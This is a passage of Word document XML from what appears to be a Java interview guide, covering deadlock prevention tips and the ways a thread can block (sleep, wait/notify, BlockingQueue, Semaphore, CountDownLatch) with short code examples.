          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DECC31" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock timeouts</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent threads from waiting indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C3883" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detecting</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deadlocks using the ThreadMXBean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A20C2B8" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>higher-level concurrency utilities</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to simplify synchronization logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DAF17A" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="00CE4B95" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By following these practices, you can ensure that your Java application remains free from deadlocks and behaves efficiently in a multithreaded environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B226554" w14:textId="6A943189" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="25B6A2E7">
          <v:rect id="_x0000_i1839" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2099C3EE" w14:textId="77777777" w:rsidR="00A15D83" w:rsidRPr="00CE4B95" w:rsidRDefault="00A15D83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="274" w:name="_Toc196307754"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the ways of blocking the threads in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="274"/>
    </w:p>
    <w:p w14:paraId="00FEC36E" w14:textId="1AAB39CD" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Java, blocking a thread means making the thread wait for some condition to be satisfied or to acquire a resource before it can continue its execution. There are several ways in which a thread can be blocked in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489BFCD8" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Using Thread.sleep()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233FD8EB" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The sleep() method causes the current thread to pause for a specified amount of time, without releasing the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63716445" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>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Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The thread is blocked for the specified amount of time (in milliseconds or nanoseconds) and cannot perform any operations during this time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10208E0D"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF63A2D"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4022A5B1"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Thread.sleep(2000); // Block the thread for 2 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B4CDF"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A00CB1F"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D425F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6815BF" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Using Object.wait()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17171522" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The wait() method is used for thread synchronization. A thread can call wait() on an object to release the lock on that object and enter the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B927D89" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>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Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The thread remains blocked (waiting) until another thread calls notify() or notifyAll() on the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6D5D8"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA6C105"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synchronized (obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5747B8E7"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D58D2"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obj.wait(); // Block the thread until notified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A956780"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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B0730A"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3A22CB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D55AFA0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F3391" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Using Object.notify() / Object.notifyAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9FC1F" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> These methods are used to wake up a thread or multiple threads that are waiting on the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39FED0" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>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lastRenderedPageBreak/>
        <w:t>Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> These methods do not directly block threads, but they can release the waiting state of a thread that was previously blocked by wait().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F14B53"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E3A038"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synchronized (obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278661DB"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obj.notify(); // Wake up one thread that is waiting on obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6964DC68"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68776B" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Using BlockingQueue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBA2475" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The BlockingQueue interface provides blocking operations for thread-safe data exchange. Methods like take() or put() block the thread until the operation can proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F155525" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>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Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a take() method is called on an empty queue, the calling thread is blocked until an element becomes available. Similarly, the put() method blocks the thread if the queue is full until space is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707078EE"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DC327B"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BlockingQueue&lt;Integer&gt; queue = new ArrayBlockingQueue&lt;&gt;(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B896171" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306BEDD7"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Put method blocks if the queue is full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37901704"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queue.put(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCFB9FD" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151EE7F8"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Take method blocks if the queue is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB5CC64"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queue.take();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EF41E" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Using Semaphore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1597E9EF" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Semaphore is a synchronization aid that controls access to a shared resource through the use of permits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF630CA" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1155"/>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Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The acquire() method blocks the thread until a permit is available. The release() method releases the permit and potentially unblocks a waiting thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BAB3B7"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D308B"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Semaphore semaphore = new Semaphore(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C4620" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6AF665"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087B4016"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semaphore.acquire(); // Blocks until a permit is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5632BA"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 Critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E50641"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512DA8AE"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACF679"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097862F1"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semaphore.release(); // Releases the permit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A786900"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286120B5" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Using CountDownLatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31309553" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The CountDownLatch allows one or more threads to wait until a set of operations being performed by other threads completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD5543" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>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Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The await() method blocks the thread until the latch count reaches zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591CC973"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40692003"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CountDownLatch latch = new CountDownLatch(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFDE7C3" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B0E10E"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Thread will be blocked until latch count reaches zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB6BF48"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latch.await();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD52E42" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
